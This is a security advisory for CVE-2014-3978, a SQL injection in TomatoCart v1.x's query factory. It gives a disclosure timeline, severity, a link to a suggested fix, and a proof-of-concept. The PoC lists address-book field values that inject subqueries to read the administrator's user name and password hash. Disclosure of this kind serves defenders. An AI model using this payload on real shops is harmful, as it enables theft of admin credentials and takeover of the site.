TomatoCart v1.x (latest-stable) Remote SQL Injection Vulnerability
Background:
TomatoCart is open source ecommerce solution developed and maintained by a number of 64,000+ users from 50+ countries and regions. It's distributed under the terms of the GNU General Public License (or "GPL"), free to download and share. The community, including project founders and other developers, are supposed to work together on the platform of TomatoCart, contributing features, technical support and services. The current stable package is TomatoCart V1.1.8.6.1, while the latest development version is version 2.0 Alpha 4. This exploit affects the "stable" tree.
Timeline:
06 June 2014 - CVE-2014-3978 assigned
06 June 2014 - Submitted to vendor
25 June 2014 - Received inadequate patch from vendor
26 June 2014 - Suggested patch sent to vendor
17 July 2014 - Request for update from vendor, no response.
05 August 2014 - Pull request sent on github for full patch
Status:
Vendor ignored, see suggested fix below.
Released:
05 August 2014 - https://breaking.technology/advisories/CVE-2014-3978.txt
Classification:
SQL Injection
Exploit Complexity:
Low
Severity:
High
Description:
TomatoCart suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection.
Required Information:
* Valid user account
PoC:
Create a new contact in your address book using the following values.
First name: :entry_lastname,
Last Name : ,(select user_name from toc_administrators order by id asc limit 1),(select user_password from toc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)#
The new contact will be added to your address book with the admin hash as the contact's street address
Suggested Action:
Pull request has been sent to the developers on github. Recommend patching the required to properly encode colon (:)
https://github.com/tomatocart/TomatoCart-v1/pull/238